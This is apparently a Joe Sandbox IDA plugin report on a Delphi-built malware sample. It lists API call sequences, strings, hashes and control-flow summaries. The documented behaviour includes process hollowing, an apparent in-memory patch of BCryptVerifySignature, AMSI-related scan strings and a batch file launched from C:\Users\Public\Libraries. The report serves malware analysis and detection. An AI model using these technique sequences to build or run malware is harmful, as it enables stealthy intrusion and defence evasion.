                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                            • API String ID: 2533507481-2367850715
                                                                                                                            • Opcode ID: b46359b7087217412d6a3a14a9728553da7971a05c77b492dcd8bd9a8c399b36
                                                                                                                            • Instruction ID: 73d3ae1f8aaad94fecebdcf4eaf511d58b285331ab963a0dbf569c467f062bc4
                                                                                                                            • Opcode Fuzzy Hash: b46359b7087217412d6a3a14a9728553da7971a05c77b492dcd8bd9a8c399b36
                                                                                                                            • Instruction Fuzzy Hash: 30E23D30A112699FEF11FBA4DC81ADEB3FAEFC5710F1490A5A009AB254DE30AE45CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 9685 2997f46-2997f4b 9687 2997f50-2997f55 9685->9687 9687->9687 9688 2997f57-299803e call 2984954 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9687->9688 9719 29999ab-2999a15 call 29844c4 * 2 call 2984c24 call 29844c4 call 29844a0 call 29844c4 * 2 9688->9719 9720 2998044-299811f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9688->9720 9720->9719 9764 2998125-299844d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2983098 * 2 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984da4 call 2984db4 CreateProcessAsUserW 9720->9764 9871 299844f-29984bb call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9764->9871 9872 29984c0-29987e6 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982ee0 call 2982f08 call 2984824 call 2984964 
control_flow_graph (graph data truncated at its start; rendered as an image in the original report). System API calls reached along the graph, in order: GetThreadContext, NtReadVirtualMemory, NtUnmapViewOfSection, NtWriteVirtualMemory (x2), SetThreadContext, NtResumeThread; the blocks between them consist of repeated calls into the helper subroutines 2984824, 2984964, 2984698, 29847b0 and 2997be8 (the last one resolves imports via LoadLibraryW/GetModuleHandleW/GetProcAddress, see APIs below), plus 2997968 (NtAllocateVirtualMemory) and 2997ac0 (x3, x2) before the paths rejoin at block 9719. Read/unmap/allocate/write/set-context/resume against a suspended child is the textbook process-hollowing sequence, which is why this function is the one to examine when triaging the "process hollowing" signature.
APIs
  • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
  • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
  • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029E4398,029E4388,OpenSession,029E4360,02999A30,ScanString,029E4360), ref: 02998446
• GetThreadContext.KERNEL32(0000083C,029E43DC,ScanString,029E4360,02999A30,UacInitialize,029E4360,02999A30,ScanBuffer,029E4360,02999A30,ScanBuffer,029E4360,02999A30,UacInitialize,029E4360), ref: 029987DF
• NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,002A4FF8,029E44B0,00000004,029E44B8,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360), ref: 02998A3C
• NtUnmapViewOfSection.N(00000840,00400000,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,002A4FF8,029E44B0,00000004,029E44B8), ref: 02998BB7
  • Part of subcall function 02997968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
  • Part of subcall function 02997968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
  • Part of subcall function 02997968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
• API String ID: 3979268988-2367850715
• Opcode ID: 07b27951bb8b5e37c9605d3cd40c8a4392e0da12ce1ea6fe9e9ceae7d76c7a05
• Instruction ID: 3871ce68b2728f9c8b93aa123e0a846e4c983ddbb86c993bf0654b15d9288a75
• Opcode Fuzzy Hash: 07b27951bb8b5e37c9605d3cd40c8a4392e0da12ce1ea6fe9e9ceae7d76c7a05
• Instruction Fuzzy Hash: 53E23D30A112699FEF11FBA4DC81ADEB3FAEFC5710F1491A5A009AB254DE30AE45CF54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph (rendered as an image in the original report; the executed/not-executed colouring is not recoverable from the text). Blocks 2985a90-2985cbd: GetModuleFileNameA, RegOpenKeyExA (up to three keys, falling through on failure), RegQueryValueExA (x2), RegCloseKey, then lstrcpynA, GetThreadLocale, GetLocaleInfoA, lstrlenA and up to three lstrcpynA/LoadLibraryExA pairs before reaching the exit block 2985cb6. Together with the Software\Borland\Locales and Software\Borland\Delphi\Locales strings below, this is the Delphi run-time library's locale resource-module lookup, i.e. compiler-generated startup code rather than malware-specific logic.
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,02980000,029AB790), ref: 02985AAC
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985ACA
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AE8
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02985B06
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02985B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02985B4F
• RegQueryValueExA.ADVAPI32(?,02985CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02985B95,?,80000001), ref: 02985B6D
• RegCloseKey.ADVAPI32(?,02985B9C,00000000,?,?,00000000,02985B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02985B8F
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02985BAC
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02985BB9
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02985BBF
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02985BEA
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C31
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C41
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C69
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C79
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02985C9F
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02985CAF
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1759228003-2375825460
• Opcode ID: f52c0c949244a260a67eebc63fff390b94327dc63d328332e0c32506e3719cc8
• Instruction ID: 1fc95ffa9080e6b38b095b27f00678c2cfc2c321ad0bf757e9aa38af9ccb30d0
• Opcode Fuzzy Hash: f52c0c949244a260a67eebc63fff390b94327dc63d328332e0c32506e3719cc8
• Instruction Fuzzy Hash: 1951B8B1A4020C7EFB25F6E4CC46FEF7BAD9B44744F8A01A5A704E61C1E7749A488F61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph (rendered as an image in the original report; the executed/not-executed colouring is not recoverable from the text). Blocks 299ca6c-299d087: a short loop at 299ca75, then a long block of calls into the helper subroutines 2984824, 2984964, 2984698, 29847b0, 2997be8 (dynamic import resolution), 2984704, 298473c, 2983098, 2987ee8, 2984d38 and 2984db4 leading to CreateProcessAsUserW at block 299ca7c. From there one path runs WaitForSingleObject followed by two CloseHandle calls (block 299cf35), the other goes straight to the cleanup block 299d03a (calls 29844c4 and 2984c24). The String ID below shows the launched command line referencing C:\Users\Public\Libraries\UcvuiswbO.bat, alongside Amsi/AmsiOpenSession strings.
APIs
  • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
  • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
  • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,029E4644,029E4688,ScanString,029E4344,0299D0A4,OpenSession,029E4344), ref: 0299CDD3
• WaitForSingleObject.KERNEL32(000005C0,000000FF,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,UacScan,029E4344), ref: 0299D01F
• CloseHandle.KERNEL32(000005C0,000005C0,000000FF,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,UacScan), ref: 0299D02A
• CloseHandle.KERNEL32(00000870,000005C0,000005C0,000000FF,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4,ScanString,029E4344,0299D0A4,OpenSession,029E4344,0299D0A4), ref: 0299D035
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
• String ID: *"C:\Users\Public\Libraries\UcvuiswbO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
• API String ID: 1205125484-1204875182
• Opcode ID: 74974e767cc30514e6e85b68489572857c7bfe08f3687e16e6f93d4c0e4a606f
• Instruction ID: fe474f8912aeb17ee39ab5892189c0aab1d0f90cd9ef6dd464820a20635533af
• Opcode Fuzzy Hash: 74974e767cc30514e6e85b68489572857c7bfe08f3687e16e6f93d4c0e4a606f
• Instruction Fuzzy Hash: ADF1F034A1025A9FEF10FBA4D880FDEB7B6AFC5710F149061A105BB254DB74EE468F61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph (rendered as an image in the original report; the executed/not-executed colouring is not recoverable from the text). Blocks 2997ac0-2997b12: LoadLibraryW at 2997ac0; on failure the function returns via block 2997b0a, otherwise GetProcAddress at 2997add, then either NtWriteVirtualMemory at 2997ae8 or a direct jump to FreeLibrary at 2997b04; both paths end in FreeLibrary and return. The APIs below show the loaded module is bcrypt and the resolved export is BCryptVerifySignature, with NtWriteVirtualMemory targeting the same process handle (00000840) used by the hollowing function above.
APIs
• LoadLibraryW.KERNEL32(bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize,029E4360,02999A30,0000083C,029E43DC,ScanString,029E4360,02999A30), ref: 02997AD2
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997ADF
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize), ref: 02997AF6
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize,029E4360,02999A30,0000083C,029E43DC), ref: 02997B05
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912
• Opcode ID: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
• Instruction ID: 4d8fae19891dc99a90615f26a17ac372393fd551bf18636c5140dbbcc39a6e6f
• Opcode Fuzzy Hash: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
• Instruction Fuzzy Hash: 6FF0E2B26193543EEA2161A95C84EFFA29DCBC27B1F04462DF5549A280DB618804C3B1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
Strings
• NtAllocateVirtualMemory, xrefs: 0299796B
• C:\Windows\System32\ntdll.dll, xrefs: 02997970
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
• Opcode ID: 516baaf22a2e1adc51648d96bbff9bea6e8700d7076f2266cfe532678e614c85
• Instruction ID: b7e096b5321ef14df4c06165886d527a33aae8c779515cb573e440ab0d54c3f3
• Opcode Fuzzy Hash: 516baaf22a2e1adc51648d96bbff9bea6e8700d7076f2266cfe532678e614c85
• Instruction Fuzzy Hash: 98E09AB6A4024CBFDF00EF98DC49EEA77ACEB48610F445411BA19DB640DA70E9508BB5
Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
Strings
• NtAllocateVirtualMemory, xrefs: 0299796B
• C:\Windows\System32\ntdll.dll, xrefs: 02997970
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
• Opcode ID: 511d5e84030df0c08940d7c02e6d78542cd2fe99c888f0db8c7bca059c6a0943
• Instruction ID: 26ba5a6e6ab3691b7857d9bcfe90ee0809cb0300295a1b9948d0b5b7fdaff78c
• Opcode Fuzzy Hash: 511d5e84030df0c08940d7c02e6d78542cd2fe99c888f0db8c7bca059c6a0943
• Instruction Fuzzy Hash: 7FE09AB694024CBFDF00EF98D849EDA77ACEB48610F445411BA19DB640DA70E5508BB5
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph

APIs
  • Part of subcall function 02984EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C5AC), ref: 0299C517
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0299C5AC), ref: 0299C547
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0299C55C
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0299C588
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0299C591
  • Part of subcall function 02984C24: SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
• Opcode ID: 5c6a237a522699dc0af2b9d786bc99d48b4a132028e6a549e84b0f0a19d8aa58
• Instruction ID: 5f74c2d06d2de8e6c36a96ff4064d37bb85fc2c58c2de1fe8789cfabc2da68b4
• Opcode Fuzzy Hash: 5c6a237a522699dc0af2b9d786bc99d48b4a132028e6a549e84b0f0a19d8aa58
• Instruction Fuzzy Hash: 2921E871A503097AEF11EAE8CC42FDEB7BDEF48710F540466B604F71C0EA74AA058B65
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0299C9EA
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 2f74b806c6fcd633e44d6aad67e1d0348284547dfa7004b44400d968458a7fc2
• Instruction ID: 5f7338326ca5e167bfddaaa1dd1e34e16cb0257da8b8b34ce1e04b540651f83c
• Opcode Fuzzy Hash: 2f74b806c6fcd633e44d6aad67e1d0348284547dfa7004b44400d968458a7fc2
• Instruction Fuzzy Hash: 1D41EA31A112499BEF10FBA8DD81EDEB7FAEFC8B14F645426E041B7250DA75AD018F60
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02984EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C4CA), ref: 0299C437
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C471
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C49E
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C4A7
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: 2b49ceb02edd4226e4778ddb04be474d1de1f92f3b45d0b7c7b7837063600821
• Instruction ID: d0b11ccbb16c359c077e3bc8b0f79d0340d97c200c2908c7f067def26061be16
• Opcode Fuzzy Hash: 2b49ceb02edd4226e4778ddb04be474d1de1f92f3b45d0b7c7b7837063600821
• Instruction Fuzzy Hash: 8921C271A40209BAEB10EBA4CC42FEEB7BDEF48B10F514462B604F71C0D7B4AE048A54
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02984EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C4CA), ref: 0299C437
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C471
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C49E
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C4A7
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: 7ad8578d0716f0f4d2883938aa5de7174a3a599dc47e7b4cd8f5cfb4f38ce3b8
• Instruction ID: 4726f10cf55fcc2c0afe96f1dfc432c9938926f870532acb0b25707ec40ef32b
• Opcode Fuzzy Hash: 7ad8578d0716f0f4d2883938aa5de7174a3a599dc47e7b4cd8f5cfb4f38ce3b8
• Instruction Fuzzy Hash: 7A21C171A40209BAEB10EBE4CC42FEEB7BDEF48B10F614462B604F71C0D7B4AE048A54
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02984EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EF2
• RtlInitUnicodeString.N(?,?,00000000,0299C3E2), ref: 0299C390
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C3E2), ref: 0299C3A6
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C3E2), ref: 0299C3C5
  • Part of subcall function 02984C24: SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
• String ID:
• API String ID: 1694942484-0
• Opcode ID: 04a8fb315ef8d24e34d95f96107fc9c2ecc209412234dc70c0e16f032f6f191a
• Instruction ID: 820cb799d5032e6fec4ee44bac3f7422d105abc8dd97eaeb51b56b1ff87f20f4
• Opcode Fuzzy Hash: 04a8fb315ef8d24e34d95f96107fc9c2ecc209412234dc70c0e16f032f6f191a
• Instruction Fuzzy Hash: 8901F475940208BBDF01EBA4CD42FCEB3FDEB8C710F904572A601E7580EA74AB048A69
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02996D28: CLSIDFromProgID.OLE32(00000000,?,00000000,02996D75,?,?,?,00000000), ref: 02996D55
• CoCreateInstance.OLE32(?,00000000,00000005,02996E68,00000000,00000000,02996DE7,?,00000000,02996E57), ref: 02996DD3
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: CreateFromInstanceProg
• String ID:
• API String ID: 2151042543-0
• Opcode ID: 5254ee1c1310cf129891ea82f89374fa4416d3c6dad30dabc50dd87d823ab021
• Instruction ID: 3f45dfbae067c40dd8dc78262a8a351f2f6f0faec8890a459d8e29875aa771f4
• Opcode Fuzzy Hash: 5254ee1c1310cf129891ea82f89374fa4416d3c6dad30dabc50dd87d823ab021
• Instruction Fuzzy Hash: BA01A7716087046FEF05EFA9DC52D6F7BADDBC9B20F920475F505D2680E6709910C964
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
  • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
  • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
